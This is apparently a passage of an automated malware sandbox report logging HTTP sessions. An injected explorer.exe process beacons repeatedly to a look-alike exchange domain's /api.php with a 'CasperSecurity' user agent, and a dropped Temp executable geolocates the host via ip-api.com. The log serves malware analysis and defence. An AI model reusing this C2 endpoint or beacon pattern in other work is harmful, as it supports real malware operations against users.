                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pxn23wWK4ZXPaqZVSnkTxQIoZxbGv9mHxrwXh%2FpYff4VQzKCxbEsbfBiNR0TJd13BaoYJfTanMe9sCLdn8KeK8BQeTEqF9tPJRHa2%2FPUQicPDBlGQSw5T5IgLtYoWtTxAlzJgCF%2Bm5XBs8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef412e6a5841c6-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                113192.168.2.449925188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.617854118 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:01.622714043 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.306035042 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:02 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2FpT9HmdusXoNvgGej0J4iyTSbMva8pW1co8qrgWQMlnpZqgYvI0sHQV9%2BByPhNhbc4zdLTVpg57t7t1rMpd%2F2LElnSYc4SJN2tE%2Fm0tBa7fFdIAwkJtb5z373fqePTIB3tI83XsRBEDumw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4133aebe3320-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                114192.168.2.449927188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.431241035 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.436265945 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.133712053 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:03 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=88HijhgtEqicxlvTLZi0yfWJsozIdAr%2BgMte5Xi4Amu4pLoVZItZRY33lTtWe6KEb%2BazxIUeB2d9NC4AfnZZdFnJCvuCnP3uRcIKFYDtLhpLeQcup5hPporyaua%2FWbSbFIH07wh5okm1GKU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4138cf7b8ce6-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                115192.168.2.449928208.95.112.1805184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:02.623472929 CEST63OUTGET /xml HTTP/1.1
                                                                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.094541073 CEST640INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:03 GMT
                                                                                                                                                                                                                                Content-Type: application/xml; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 465
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                X-Ttl: 7
                                                                                                                                                                                                                                X-Rl: 40
                                                                                                                                                                                                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                116192.168.2.449929188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.242660999 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.249310017 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.418967962 CEST625INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:04 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hh%2FTRkTu5qxi1d%2BvUYzMRiM9zO98o%2BFxl7ivyKO7cDCCtGNlBavWGb3wUNpitRWDqoh3cb3Sjz%2BIFmCtP8ZsTMB%2F8JYLTJeINaL8Q0%2Bmd2GmCFohT9MVdq50nkI8GbSZfSAgKEGaVNHn4%2Bo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef413dcd688c42-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                117192.168.2.449930208.95.112.180
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.301712036 CEST63OUTGET /xml HTTP/1.1
                                                                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Jul 6, 2024 13:29:03.764298916 CEST640INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:03 GMT
                                                                                                                                                                                                                                Content-Type: application/xml; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 465
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                X-Ttl: 6
                                                                                                                                                                                                                                X-Rl: 39
                                                                                                                                                                                                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                118192.168.2.449932188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.543667078 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.548959017 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.788850069 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:05 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dOnTFfGkgrFbxQZkrOF%2BYGqm7pzZefie16LuQ4kKGiruVX2%2FMjpCyjdmKXoP%2F%2Fz9xvfjzCTkOoj6YjMpKSXfCNs8jIL4fQ5Jga20dPyLmbc3wrwQCZCjtnE0wRDM2dtZ9d7RZd4qr4Wpjds%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef41461b8c41f3-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                119192.168.2.449933208.95.112.180
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:04.606386900 CEST63OUTGET /xml HTTP/1.1
                                                                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.106760025 CEST640INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:05 GMT
                                                                                                                                                                                                                                Content-Type: application/xml; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 465
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                X-Ttl: 5
                                                                                                                                                                                                                                X-Rl: 38
                                                                                                                                                                                                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                120192.168.2.449935208.95.112.180
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.586594105 CEST39OUTGET /xml HTTP/1.1
                                                                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.040779114 CEST640INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:05 GMT
                                                                                                                                                                                                                                Content-Type: application/xml; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 465
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                X-Ttl: 4
                                                                                                                                                                                                                                X-Rl: 37
                                                                                                                                                                                                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                121192.168.2.449936188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.900229931 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:05.906161070 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.621264935 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:06 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ZkVb%2BFuta6TCY3bxVOyDRC6kZZtlUcs7CuTAqEftqUPQAZ0O2Er9Vts4lOP%2FDqvMsMJF%2BvfOENh2HJYyIh1KbuHnGH%2FBl893X1The4n9XpW7Mjmy0sn2nJte%2FkQwdsxN2HhTUK6oTGCgAM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef414e6ce441e1-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                122192.168.2.449939188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.742455959 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:06.747443914 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.507006884 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:07 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f3ajBFn1vOnBCejYNo8dB1xfS8TSmeTSkENjFm5BYQBcyTiirFV5RHiQgTgc%2BfP5YxYxdhThZo5fFtdHmO1XXjbkcpOsxdGUJ3oliUpIPPeh30Pu%2FRGI5eXaTvTagXNvJ%2FmX%2BIkDRA%2Bno6Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4153ce4d5e71-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                123192.168.2.449940188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.617738008 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:07.622685909 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.351695061 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:08 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zpQyiVKf6CtMeNrtfdthIKmz0sdk5UWtiB%2BgvM038tK4h9CqsJS75mJIRvh6igH9cAKq67ycEMe%2B3AsbmsVpg%2FwlEvnbuULc1dqgfGt37xfaZvgZGWc0EQ0R5VZJLWqLJ3zKpUIUUuGd5KU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef41594c31423b-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                124192.168.2.449941188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.461582899 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:08.467904091 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:09.211308002 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:09 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2cBHD0PxSubK9YQeD3D5ee1abvBUya4%2F1QIMD1oyNWCEDQjht4%2F%2Bo115E1QMGD8SecNJ3U8QujkgIJMy781IDZcKQR7Amp%2BgpAS%2FBCeMB1CqABEaN2pmBfHjc6hBTgwrl8kQHg4EyFRz9SQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef415e9a0743ad-EWR
